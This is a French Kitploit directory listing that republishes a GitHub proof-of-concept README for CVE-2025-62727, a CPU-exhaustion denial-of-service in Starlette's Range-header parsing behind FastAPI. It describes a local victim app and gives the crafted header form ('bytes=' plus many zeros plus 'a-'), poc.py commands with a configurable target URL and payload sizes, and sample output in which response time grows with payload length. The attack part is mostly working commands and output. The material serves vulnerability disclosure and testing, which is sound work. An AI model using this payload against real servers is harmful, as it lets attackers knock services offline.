Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-62727-Demo — Preuve de concept de la CVE-2025-62727 pouvant provoquer un déni de service dans FastAPI (basé sur Starlette <= 0.48.0) | Kitploit
Outils/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
Analyse des VulnérabilitésExploitationSécurité WebSécurité des API
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

Preuve de concept de la CVE-2025-62727 pouvant provoquer un déni de service dans FastAPI (basé sur Starlette <= 0.48.0)

Voir le dépôt
1il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Démo CVE-2025-62727

Description de la victime

La cible victime de CVE-2025-62727 est une simple application FastAPI qui :

  • Sert Hello World à /.
  • Sert des fichiers statiques sous /static en utilisant StaticFiles de Starlette.
  • Génère automatiquement des fichiers texte contenant A répété N fois pour N dans 1024, 2048, 50176 au démarrage.

Comment exécuter la victime

  1. (Optionnel) Créer et activer un virtualenv.

  2. Installer les dépendances :

    root@kitploit:~
    pip install -r requirements.txt
    
  • Démarrer le serveur :

    root@kitploit:~
    uvicorn main:app --reload
    
  • Ouvrir :

    • http://127.0.0.1:8000/ pour la page d'index.
    • http://127.0.0.1:8000/static/1024.txt etc. pour les fichiers statiques.

    Remarques

    • Les fichiers statiques sont générés dans le répertoire static/ au démarrage de l'application. Les fichiers existants ne sont pas écrasés.
    • Le service statique utilise StaticFiles de Starlette comme demandé.

    PoC : CVE-2025-62727 (Analyse de l'en-tête Range)

    Le poc.py inclus déclenche une analyse Range gourmande en CPU dans FileResponse de Starlette via la route /static en utilisant un en-tête forgé de la forme bytes=000...000a-.

    Exécutez le serveur, puis dans un autre shell :

    root@kitploit:~
    python3 poc.py --sizes 1000,2000,4000,7000
    

    Remplacez l'URL cible (optionnel) :

    root@kitploit:~
    python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
    

    Remarques :

    • Le PoC cible http://127.0.0.1:8000/static/50176.txt par défaut (un fichier généré par l'application). Utilisez --url pour le modifier.
    • Ajustez --sizes à la baisse si vous voyez 400/431 (en-tête trop grand), ou à la hausse si les en-têtes réussissent et que vous souhaitez un effet plus fort.

    Exemple de résultat :

    root@kitploit:~
    $ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
    [INFO] Target: http://127.0.0.1:8000/static/50176.txt
    [MODE] regex (header = 'bytes=' + '0'*N + 'a-')
    N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
    N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
    N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
    N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
    
    Télécharger l’outil